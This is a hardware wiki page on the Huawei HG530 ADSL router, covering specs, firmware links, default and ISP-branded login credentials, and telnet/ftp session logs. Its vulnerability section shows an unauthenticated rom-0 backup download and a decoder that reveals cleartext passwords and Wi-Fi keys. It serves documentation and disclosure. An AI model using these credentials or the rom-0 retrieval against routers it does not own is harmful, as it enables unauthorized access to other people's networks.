Huawei HG530

From WikiDevi.Wi-Cat.RU
Jump to navigation Jump to search

Huawei HG530

Country of manuf.: China

Type: wireless router, dsl modem

FCC ID: QISHG530

Power: 12 VDC, 0.5 A
Connector type: barrel

CPU1: TrendChip TC3162U
FLA1: 2 MiB2,097,152 B <br />16,384 Kib <br />2,048 KiB <br />16 Mib <br />0.00195 GiB <br /> (Macronix MX25L1606E)
RAM1: 8 MiB8,388,608 B <br />65,536 Kib <br />8,192 KiB <br />64 Mib <br />0.00781 GiB <br /> (EtronTech EM638165TS-6G)

Expansion IFs: none specified

WI1 chip1: Ralink RT3390
WI1 802dot11 protocols: bgn
WI1 MIMO config: 1x1:1
WI1 antenna connector: U.FL

ETH chip1: TrendChip TC3162U
Switch: TrendChip TC2206F
LAN speed: 100M
LAN ports: 4

bgn

Additional chips
DSL (ADSL2+) AFE;TrendChip;TC3086;TRENDCHIP, TC3086-QFN64-EPG, C2W49800, TP1130B5;1;

Stock FW OS: ZyNOS

Flags: ADSL2+

Default IP address: 192.168.1.1
the IP 192.168.1.1 is used by 1304 additional devices
of which 16 are Huawei devices
Default login user: admin
Default login password: admin
admin:admin credentials used by 1327 additional devices
of which 15 are Huawei devices

802dot11 OUI: AC:E8:7B
Ethernet OUI: AC:E8:7B

For a list of all currently documented Ralink chipsets with specifications, see Ralink.
For a list of all currently documented TrendChip chipsets with specifications, see TrendChip.


Huawei HG530 - Wireless ADSL Modem Router

Router is labeled: "bg Wi-Fi certified, with some n features". It is a draft-n router, compatible with 802.11n standard.

Same chipset as ZyXEL P-660HN-TxA (T1A, T3A), Billion BiPAC 5200W (Manual), and D-Link_DSL-2680_rev_A1 (2 LAN ports only).

Additional external links

Manuals

Product Description
User Guide
User Guide
User Guide (Spanish)

Firmware

Telmex branded firmware
Telnor firmware
ColombiaTel firmware
ETB firmware (zip archive, not rar!)

Components

MX25L1606E datasheet
EM638165TS datasheet

Command Line

(selection of ZyXEL devices as no matching Huawei CLI guide found)
Prestige 334w CI Command List
CLI Reference Guide Version 3.70
CLI Reference Guide Versions: 3.79, 3.80, 3.90, 4.00
ZyNOS CI and BootBase Commands (ZyNOS 1999)
Using the console port

Router login

The HG530 supports 3 different user names; login is possible by using the following protocols.

  • Web interface: http
  • Console login: telnet
  • File transfer: ftp

Default login user & password

The HG530 was often distributed as custom branded version by ISP's such as Telmex or Claro
(both ISPs in the Latin America region) with non-standard login user/password combinations.

The pictures below show a Claro branded router with admin defaults found here (tested),
while defaults for user2 and user3 were extracted from rom-0 backup file (tested):

 • login user & password
  • login user1: admin
  • login password1: Tu64$TEL
  • login user2: usuario
  • login password2: Turbonett
  • login user3: user
  • login password3: Turbonett

Claro Dominican Republic instructions suggests (untested):

  • login user: (MAC address as on label)
  • login password: (MAC address as on label)

Telmex branded router according to firmware update instructions (untested):

  • login user: Telmex
  • login password: (WEP key from label on backside)

Other likely user/password combinations as found here and here (untested):

  • login user: admin
  • login password: d3c0ntr0l

or

  • login user: admin
  • login password: CEP#(plus last 6 digits of serial number)
    e.g. serial number: 89546123011578, password: CEP#011578

Telnet

Opens a session with the ZyNOS CI. All users (admin, user) have full privileges!

 • telnet
$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

Username: admin

Password: ********
Copyright (c) 2001 - 2011 Huawei

HG530> help
Valid commands are:
sys             exit            ether           wan               
etherdbg        tcephydbg       ip              bridge            
dot1q           pktqos          show            set               
lan

HG530> sys
modfTTL         edit            feature         hostname          
log             resetlog        stdio           syslog            
version         view            wdog            romreset          
factoryreset    atssid          atwpakey        atwepkey          
acl             keytest         atsh            diag              
routeip         bridge          save            display           
password        default         batchnumber     versionstyle      
versionM        multiuser       password2nd     username2nd       
deleteUser      getusername2nd  password3rd     username3rd       
delete3rdUser   getusername3rd  adminname       modelcheck        
attainrateflag  pswauthen       setser          resetbtntime      
setdefaultlanip fwuptimeout     sptromsize      syncinterval      
tcpdebug        cwmp            socket          filter            
cpu
 • sys version
HG530> sys version

 RAS version: V100R001C10B023 SALVADOR
 RAS version(web): V100R001B023 SALVADOR 2011/04/27 
 System   ID: $5.1.54.0(RUE0.C2)3.12.8.20     20110407_V001  [Apr 07 2011 15:06:42]
 romRasSize: 1357172 
 system up time:     2:03:49 (b5601 ticks)
 bootbase version: VTC_SPI1.11 | 2011/03/11

HG530> sys atsh

RAS version            : V100R001B023 SALVADOR
romRasSize             : 1363726
bootbase version       : VTC_SPI1.13 | 2011/10/13
Product Model          : Home Gateway
MAC Address            : ACE87B008C88
Default Country Code   : FF
Boot Module Debug Flag : 00
RomFile Version        : 01
RomFile Checksum       : d396
RAS F/W Checksum       : 5685
SNMP MIB level & OID   : 050000000100000002000000030000000400000005
Main Feature Bits      : 86
Other Feature Bits     :
93 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 13 00 00 00

HG530> sys getusername2nd
secondUserName: usuario
HG530> sys getusername3rd
thirdUserName: user

FTP

Gives write-only access to the firmware, and read/write access to the rom-0 backup file.

Only user admin is allowed to login!
 • ftp
$ ftp 192.168.1.1
Connected to 192.168.1.1.
220 HG530 FTP version 1.0 ready at Sat Jan 01 05:50:34 2000
Name (192.168.1.1:john): admin
331 Enter PASS command
Password:
230 Logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 Port command okay
150 Opening data connection for LIST 
--w--w--w-   1 owner    group         1363726 Jul 01 12:00 ras
-rw-rw-rw-   1 owner    group          131072 Jul 01 12:00 rom-0
?226 File sent OK

$ ftp 192.168.1.1
Connected to 192.168.1.1.
220 HG530 FTP version 1.0 ready at Sat Jan 01 02:08:30 2000
Name (192.168.1.1:john): user
530 User user cannot log in.
Login failed.

Vulnerabilities

rom-0

As many other ZyNOS based devices, the HG530 allows downloading the configuration backup file rom-0 without any authentication.

http://192.168.1.1/rom-0

The rom-0 file is LZS compressed (see reverse engineering the zyxel configuration backup file and static analysis).

The java based rom-0 decoder from github reveals clear text login password, SSID and WEP key.
$ java -jar rom0.jar rom-0
.l.password.HG530.u.public.a.dhcpp.192.43.244.18.P.E.5.user.Turbonett.@.l.password.HG530.u.public.l.password.HG530.u.`.L.2`ISP-0.{. .turbonett.RN.}.d.-.@.@.L.0. .d.B.RN.w`.{.0.@.0.@.$.L.Q.'P.dhcppc.}.d.+.*.HG520.d. .$.(.0.SUA.8.P.Z.d. .$.A.^.>._=. .H. TURBONETT_008C88.d.+.*.74E75C4CDB.3.".%.@!.dd.d.RT3390_2.A.^.>._=.3. .H. TURBONETT_008C88.d.+.*.4.4.vlan14.5.C!.(.(.1`.W$h.(.(.1`.W$h.$.@.@usuario.%.Q.{/tr069.H.wei Technologies Co., Ltd.HG530.00E0FC.HG530TRA.0.1-.T.:.Z.4.33_4.0.H.0.Wf.

TBD: Credential disclosure in modems Huawei HG510, HG520x, HG530 and possibly others [1] [2] [3] [4] [5]

Images

from User:Zerohero

P.S. Others pictures [6] [7] do show a 3rd on-board switching regulator.